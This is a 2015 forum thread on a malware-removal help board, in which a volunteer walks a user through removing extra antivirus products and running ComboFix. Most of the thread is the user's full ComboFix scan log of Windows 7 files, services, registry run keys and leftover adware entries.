Please uninstall all but one using the tools you may find in the following link: Uninstallers (removal tools) for common Windows antivirus software.
 
Step 1

Please download Combofix (by sUBs) and save it to your Desktop.

  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan - instructions here.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.

Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)


regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer

#6 dwayne12


Posted 28 June 2015 - 11:22 AM

The uninstaller is only showing me Malwarebytes Antimalware and my one AV.



#7 deeprybka


Posted 28 June 2015 - 11:25 AM

"and my one Av"

Which one?


regards,
deeprybka

#8 dwayne12


Posted 28 June 2015 - 11:25 AM

AVG



#9 deeprybka


Posted 28 June 2015 - 11:30 AM

Please try to uninstall Ad-Aware Antivirus using Revo.


regards,
deeprybka

#10 dwayne12


Posted 28 June 2015 - 11:32 AM

I was trying to get rid of it for such a long time, and I cannot uninstall Ad-Aware with Revo; I tried.



#11 deeprybka


Posted 28 June 2015 - 11:40 AM

OK, then uninstall AVG and proceed with the instructions above.


regards,
deeprybka

#12 dwayne12


Posted 28 June 2015 - 11:43 AM

My Ad-Aware expired and it has not been updated for years, I think. I really want to get rid of it.



#13 deeprybka


Posted 28 June 2015 - 11:44 AM

We will remove it manually afterwards.


regards,
deeprybka

#14 dwayne12


Posted 28 June 2015 - 11:47 AM

k



#15 dwayne12


Posted 28 June 2015 - 06:36 PM

ComboFix 15-06-27.01 - User 06/28/2015  19:07:29.1.4 - x64
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.8191.5605 [GMT -4:00]
Running from: c:\users\User\Downloads\ComboFix.exe
AV: Ad-Aware Antivirus *Disabled/Outdated* {D87B6541-12A1-DAEA-0033-9B8057AAB996}
FW: Ad-Aware Firewall *Disabled* {E040E464-58CE-DBB2-2B6C-32B5A979FEED}
SP: Ad-Aware Antivirus *Disabled/Outdated* {631A84A5-349B-D564-3A83-A0F22C2DF32B}
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
.
(((((((((((((((((((((((((((((((((((((((   Drivers/Services   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_TESSAFE
-------\Service_TesSafe
.
.
(((((((((((((((((((((((((   Files Created from 2015-05-28 to 2015-06-28  )))))))))))))))))))))))))))))))
.
.
2015-06-28 15:37 . 2015-06-28 15:41    --------    d-----w-    C:\FRST
2015-06-28 13:26 . 2015-06-28 13:26    --------    d-----w-    c:\program files (x86)\Malwarebytes Anti-Malware
2015-06-28 13:26 . 2015-04-14 13:37    63704    ----a-w-    c:\windows\system32\drivers\mwac.sys
2015-06-28 13:26 . 2015-04-14 13:37    107736    ----a-w-    c:\windows\system32\drivers\mbamchameleon.sys
2015-06-28 13:26 . 2015-04-14 13:37    25816    ----a-w-    c:\windows\system32\drivers\mbam.sys
2015-06-28 13:22 . 2015-06-28 13:22    --------    d-----w-    c:\program files (x86)\VS Revo Group
2015-06-22 16:57 . 2015-06-28 23:02    --------    d-----w-    c:\program files\Common Files\AV
2015-06-20 10:29 . 2015-05-19 03:29    46768    ----a-w-    c:\windows\system32\drivers\nvvad64v.sys
2015-06-20 10:29 . 2015-05-19 03:14    57520    ----a-w-    c:\windows\SysWow64\nvaudcap32v.dll
2015-06-20 10:25 . 2015-06-20 10:29    --------    d-----w-    c:\programdata\Oracle
2015-06-10 14:16 . 2015-05-23 03:15    47616    ----a-w-    c:\windows\SysWow64\ieetwproxystub.dll
2015-06-02 18:24 . 2015-06-02 18:24    --------    d-----w-    c:\users\User\AppData\Local\Avg
2015-06-02 03:15 . 2015-06-02 03:18    --------    d-----w-    c:\users\User\AppData\Local\TINDER~1
2015-06-02 03:14 . 2015-06-02 03:18    --------    d-----w-    c:\program files (x86)\Tinder++
2015-05-30 04:07 . 2015-05-30 04:07    --------    d-----w-    c:\program files (x86)\Microsoft Expression
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-06-28 23:25 . 2014-03-29 23:10    136408    ----a-w-    c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-06-11 15:48 . 2011-06-26 14:32    140135120    ----a-w-    c:\windows\system32\MRT.exe
2015-06-04 21:51 . 2012-12-28 01:06    778416    ----a-w-    c:\windows\SysWow64\FlashPlayerApp.exe
2015-06-04 21:51 . 2012-12-28 01:06    142512    ----a-w-    c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-06-03 21:04 . 2015-02-22 00:21    1320304    ----a-w-    c:\windows\SysWow64\nvspcap.dll
2015-06-03 21:04 . 2015-02-22 00:21    1316000    ----a-w-    c:\windows\SysWow64\nvspbridge.dll
2015-06-03 21:04 . 2015-02-22 00:21    1756424    ----a-w-    c:\windows\system32\nvspbridge64.dll
2015-06-03 21:04 . 2015-02-22 00:21    1571696    ----a-w-    c:\windows\system32\nvspcap64.dll
2015-05-19 03:14 . 2015-02-22 00:18    61616    ----a-w-    c:\windows\system32\nvaudcap64v.dll
2015-05-09 03:13 . 2015-06-10 14:17    44032    ----a-w-    c:\windows\apppatch\acwow64.dll
2015-05-05 01:29 . 2015-05-13 04:30    342016    ----a-w-    c:\windows\system32\schannel.dll
2015-05-05 01:12 . 2015-05-13 04:30    248832    ----a-w-    c:\windows\SysWow64\schannel.dll
2015-05-01 13:17 . 2015-05-13 05:48    124112    ----a-w-    c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16 . 2015-05-13 05:48    102608    ----a-w-    c:\windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-20 03:17 . 2015-05-13 04:29    1179136    ----a-w-    c:\windows\system32\FntCache.dll
2015-04-20 03:17 . 2015-05-13 04:29    1647104    ----a-w-    c:\windows\system32\DWrite.dll
2015-04-20 02:56 . 2015-05-13 04:29    1250816    ----a-w-    c:\windows\SysWow64\DWrite.dll
2015-04-18 03:10 . 2015-05-13 04:30    460800    ----a-w-    c:\windows\system32\certcli.dll
2015-04-18 02:56 . 2015-05-13 04:30    342016    ----a-w-    c:\windows\SysWow64\certcli.dll
2015-04-13 03:28 . 2015-05-13 04:29    328704    ----a-w-    c:\windows\system32\services.exe
2015-04-08 03:29 . 2015-05-13 04:28    275456    ----a-w-    c:\windows\system32\InkEd.dll
2015-04-08 03:29 . 2015-05-13 04:28    24576    ----a-w-    c:\windows\system32\jnwmon.dll
2015-04-08 03:14 . 2015-05-13 04:28    216064    ----a-w-    c:\windows\SysWow64\InkEd.dll
2015-04-04 03:29 . 2015-05-13 04:30    95680    ----a-w-    c:\windows\system32\drivers\ksecdd.sys
2015-04-04 03:29 . 2015-05-13 04:30    155576    ----a-w-    c:\windows\system32\drivers\ksecpkg.sys
2015-04-04 03:22 . 2015-05-13 04:30    210944    ----a-w-    c:\windows\system32\wdigest.dll
2015-04-04 03:22 . 2015-05-13 04:30    86528    ----a-w-    c:\windows\system32\TSpkg.dll
2015-04-04 03:22 . 2015-05-13 04:30    29184    ----a-w-    c:\windows\system32\sspisrv.dll
2015-04-04 03:22 . 2015-05-13 04:30    136192    ----a-w-    c:\windows\system32\sspicli.dll
2015-04-04 03:22 . 2015-05-13 04:30    28160    ----a-w-    c:\windows\system32\secur32.dll
2015-04-04 03:22 . 2015-05-13 04:30    314880    ----a-w-    c:\windows\system32\msv1_0.dll
2015-04-04 03:22 . 2015-05-13 04:30    309760    ----a-w-    c:\windows\system32\ncrypt.dll
2015-04-04 03:22 . 2015-05-13 04:30    1461760    ----a-w-    c:\windows\system32\lsasrv.dll
2015-04-04 03:22 . 2015-05-13 04:30    728064    ----a-w-    c:\windows\system32\kerberos.dll
2015-04-04 03:22 . 2015-05-13 04:30    22016    ----a-w-    c:\windows\system32\credssp.dll
2015-04-04 03:20 . 2015-05-13 04:30    31232    ----a-w-    c:\windows\system32\lsass.exe
2015-04-04 03:20 . 2015-05-13 04:30    64000    ----a-w-    c:\windows\system32\auditpol.exe
2015-04-04 03:17 . 2015-05-13 04:30    60416    ----a-w-    c:\windows\system32\msobjs.dll
2015-04-04 03:17 . 2015-05-13 04:30    146432    ----a-w-    c:\windows\system32\msaudite.dll
2015-04-04 03:15 . 2015-05-13 04:30    686080    ----a-w-    c:\windows\system32\adtschema.dll
2015-04-04 03:05 . 2015-05-13 04:30    172032    ----a-w-    c:\windows\SysWow64\wdigest.dll
2015-04-04 03:05 . 2015-05-13 04:30    65536    ----a-w-    c:\windows\SysWow64\TSpkg.dll
2015-04-04 03:05 . 2015-05-13 04:30    22016    ----a-w-    c:\windows\SysWow64\secur32.dll
2015-04-04 03:05 . 2015-05-13 04:30    221184    ----a-w-    c:\windows\SysWow64\ncrypt.dll
2015-04-04 03:05 . 2015-05-13 04:30    259584    ----a-w-    c:\windows\SysWow64\msv1_0.dll
2015-04-04 03:05 . 2015-05-13 04:30    550912    ----a-w-    c:\windows\SysWow64\kerberos.dll
2015-04-04 03:05 . 2015-05-13 04:30    17408    ----a-w-    c:\windows\SysWow64\credssp.dll
2015-04-04 03:04 . 2015-05-13 04:30    50176    ----a-w-    c:\windows\SysWow64\auditpol.exe
2015-04-04 03:04 . 2015-05-13 04:30    96768    ----a-w-    c:\windows\SysWow64\sspicli.dll
2015-04-04 03:01 . 2015-05-13 04:30    60416    ----a-w-    c:\windows\SysWow64\msobjs.dll
2015-04-04 03:01 . 2015-05-13 04:30    146432    ----a-w-    c:\windows\SysWow64\msaudite.dll
2015-04-04 02:59 . 2015-05-13 04:30    686080    ----a-w-    c:\windows\SysWow64\adtschema.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"LWS"="c:\program files (x86)\Logitech\LWS\Webcam Software\LWS.exe" [2011-11-11 205336]
"hpqSRMon"="c:\program files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe" [2008-07-22 150528]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-10-11 60712]
"Standard Mouse Driver"="c:\program files (x86)\Standard Mouse Driver\Monitor.exe" [2013-01-04 147456]
"Adobe Creative Cloud"="c:\program files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" [2014-07-22 2694040]
"QuickTime Task"="c:\program files (x86)\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-10-15 157480]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
HP Digital Imaging Monitor.lnk - c:\program files (x86)\HP\Digital Imaging\bin\hpqtra08.exe [2009-9-20 270336]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer]
"NoThumbnailCache"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]
"LoadAppInit_DLLs"=1 (0x1)
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R3 CompFilter64;UVCCompositeFilter;c:\windows\system32\DRIVERS\lvbflt64.sys;c:\windows\SYSNATIVE\DRIVERS\lvbflt64.sys [x]
R3 dump_wmimmc;dump_wmimmc; [x]
R3 EagleX64;EagleX64;c:\windows\system32\drivers\EagleX64.sys;c:\windows\SYSNATIVE\drivers\EagleX64.sys [x]
R3 hwmobile;Huawei FP Handset USB Modem and USB Serial;c:\windows\system32\DRIVERS\hwusbser.sys;c:\windows\SYSNATIVE\DRIVERS\hwusbser.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 LVPr2M64;Logitech LVPr2M64 Driver;c:\windows\system32\DRIVERS\LVPr2M64.sys;c:\windows\SYSNATIVE\DRIVERS\LVPr2M64.sys [x]
R3 LVRS64;Logitech RightSound Filter Driver;c:\windows\system32\DRIVERS\lvrs64.sys;c:\windows\SYSNATIVE\DRIVERS\lvrs64.sys [x]
R3 LVUVC64;Logitech HD Webcam C510(UVC);c:\windows\system32\DRIVERS\lvuvc64.sys;c:\windows\SYSNATIVE\DRIVERS\lvuvc64.sys [x]
R3 MAUSBFASTTRACKULTRA;Service for M-Audio Fast Track Ultra;c:\windows\system32\DRIVERS\MAudioFastTrackUltra.sys;c:\windows\SYSNATIVE\DRIVERS\MAudioFastTrackUltra.sys [x]
R3 npggsvc;nProtect GameGuard Service;c:\windows\system32\GameMon.des;c:\windows\SYSNATIVE\GameMon.des [x]
R3 Point64;Microsoft IntelliPoint Filter Driver;c:\windows\system32\DRIVERS\point64.sys;c:\windows\SYSNATIVE\DRIVERS\point64.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 SWDUMon;SWDUMon;c:\windows\system32\DRIVERS\SWDUMon.sys;c:\windows\SYSNATIVE\DRIVERS\SWDUMon.sys [x]
R3 Synth3dVsc;Synth3dVsc; [x]
R3 Te.Service;Te.Service;c:\program files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe;c:\program files (x86)\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 tsusbhub;tsusbhub; [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 VGPU;VGPU; [x]
R3 vtany;vtany; [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WSDScan;WSD Scan Support via UMB;c:\windows\system32\DRIVERS\WSDScan.sys;c:\windows\SYSNATIVE\DRIVERS\WSDScan.sys [x]
R3 X6va005;X6va005; [x]
R3 X6va012;X6va012; [x]
R3 xhunter1;xhunter1;c:\windows\xhunter1.sys;c:\windows\xhunter1.sys [x]
R3 xsherlock;xsherlock;c:\windows\system32\xsherlock.xem;c:\windows\SYSNATIVE\xsherlock.xem [x]
R4 LavasoftAdAwareService11;Ad-Aware Service 11;c:\program files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe;c:\program files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [x]
S0 sptd;sptd;c:\windows\\SystemRoot\System32\Drivers\sptd.sys;c:\windows\\SystemRoot\System32\Drivers\sptd.sys [x]
S2 ABBYY.Licensing.FineReader.Sprint.9.0;ABBYY FineReader 9.0 Sprint Licensing Service;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe;c:\program files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [x]
S2 GfExperienceService;NVIDIA GeForce Experience Service;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe;c:\program files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [x]
S2 MBAMScheduler;MBAMScheduler;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [x]
S2 MBAMService;MBAMService;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe;c:\program files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [x]
S2 Norton PC Checkup Application Launcher;Norton PC Checkup Application Launcher;c:\program files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe;c:\program files (x86)\Norton PC Checkup 3.0\SymcPCCULaunchSvc.exe [x]
S2 NvNetworkService;NVIDIA Network Service;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe;c:\program files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [x]
S2 NvStreamSvc;NVIDIA Streamer Service;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe;c:\program files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [x]
S2 PCCUJobMgr;Common Client Job Manager Service;c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe;c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe [x]
S2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe;c:\program files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe [x]
S2 UMVPFSrv;UMVPFSrv;c:\program files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe;c:\program files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe [x]
S3 L1C;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller (NDIS 6.20);c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys;c:\windows\SYSNATIVE\drivers\MBAMSwissArmy.sys [x]
S3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
S3 NvStreamKms;NvStreamKms;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys;c:\program files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [x]
S3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);c:\windows\system32\drivers\nvvad64v.sys;c:\windows\SYSNATIVE\drivers\nvvad64v.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MBAMSWISSARMY
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt    REG_MULTI_SZ       hpqcxs08 hpqddsvc
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2015-06-22 19:51    990024    ----a-w-    c:\program files (x86)\Google\Chrome\Application\43.0.2357.130\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2015-02-20 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-12-28 21:51]
.
2015-02-20 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000Core.job
- c:\users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23 05:15]
.
2015-02-20 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1557550123-2840590655-2789666575-1000UA.job
- c:\users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe [2013-10-23 05:15]
.
2015-05-16 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
2015-06-28 c:\windows\Tasks\GoogleUpdateTaskMachineCore1d08f045e922a21.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
2015-05-16 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
2015-06-28 c:\windows\Tasks\GoogleUpdateTaskMachineUA1d08f045f011a31.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-03-24 02:26]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco1]
@="{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}"
[HKEY_CLASSES_ROOT\CLSID\{AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47}]
2014-07-16 15:06    672416    ----a-w-    c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco2]
@="{853B7E05-C47D-4985-909A-D0DC5C6D7303}"
[HKEY_CLASSES_ROOT\CLSID\{853B7E05-C47D-4985-909A-D0DC5C6D7303}]
2014-07-16 15:06    672416    ----a-w-    c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ AccExtIco3]
@="{42D38F2E-98E9-4382-B546-E24E4D6D04BB}"
[HKEY_CLASSES_ROOT\CLSID\{42D38F2E-98E9-4382-B546-E24E4D6D04BB}]
2014-07-16 15:06    672416    ----a-w-    c:\program files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2009-10-21 8306208]
"IntelliPoint"="c:\program files\Microsoft IntelliPoint\ipoint.exe" [2011-04-13 2399632]
"AdAwareTray"="c:\program files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareTray.exe" [2014-06-03 7715160]
"AdobeAAMUpdater-1.0"="c:\program files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe" [2014-02-28 558496]
"NvBackend"="c:\program files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe" [2015-06-03 2754704]
"ShadowPlay"="c:\windows\system32\nvspcap64.dll" [2015-06-03 1571696]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
mStart Page = about:blank
mLocal Page = c:\windows\SysWOW64\blank.htm
mSearch Bar = https://ca.yahoo.com?fr=hp-avast&type=avastbcl
uInternet Settings,ProxyOverride = 127.0.0.1:9421;<local>;*.local
IE: &D&ownload &with BitComet - c:\program files (x86)\BitComet\BitComet.exe/AddLink.htm
IE: &D&ownload all video with BitComet - c:\program files (x86)\BitComet\BitComet.exe/AddVideo.htm
IE: &D&ownload all with BitComet - c:\program files (x86)\BitComet\BitComet.exe/AddAllLink.htm
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\users\User\AppData\Roaming\Mozilla\Firefox\Profiles\73ou9irr.default-1393877900780\
user_pref(extensions.autoDisableScopes,14);
.
.
------- File Associations -------
.
inifile="%SystemRoot%\system32\NOTEPAD.EXE" %1
txtfile="%SystemRoot%\system32\NOTEPAD.EXE" %1
.
- - - - ORPHANS REMOVED - - - -
.
URLSearchHooks-{1392b8d2-5c05-419f-a8f6-b9f15a596612} - (no file)
Wow6432Node-HKLM-Run-BlueStacks Agent - c:\program files (x86)\BlueStacks\HD-Agent.exe
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
WebBrowser-{1392B8D2-5C05-419F-A8F6-B9F15A596612} - (no file)
ShellIconOverlayIdentifiers-{472083B0-C522-11CF-8763-00608CC02F24} - (no file)
AddRemove-SearchProtect - c:\progra~2\SearchProtect\Main\bin\uninstall.exe
AddRemove-Dealply - c:\users\User\AppData\Roaming\DealPly\UpdateProc\UpdateTask.exe
AddRemove-GoforFiles - c:\program files (x86)\GoforFiles\uninstall.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PCCUJobMgr]
"ImagePath"="\"c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\ccSvcHst.exe\" /s \"PCCUJobMgr\" /m \"c:\program files (x86)\Norton PC Checkup\Engine\2.0.12.27\diMaster.dll\" /prefetch:1"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\npggsvc]
"ImagePath"="c:\windows\system32\GameMon.des -service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\xsherlock]
"ImagePath"="c:\windows\system32\xsherlock.xem"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Approved Extensions]
@Denied: (2) (LocalSystem)
.
[HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
@Denied: (2) (LocalSystem)
"Timestamp"=hex:62,71,2e,4e,51,26,cd,01
.
[HKEY_USERS\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.eml\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.Email.1"
.
[HKEY_USERS\S-1-5-21-1557550123-2840590655-2789666575-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vcf\UserChoice]
@Denied: (2) (LocalSystem)
"Progid"="WindowsLiveMail.VCard.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_17_0_0_188_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_17_0_0_188_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_17_0_0_188_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_17_0_0_188_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_17_0_0_188.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
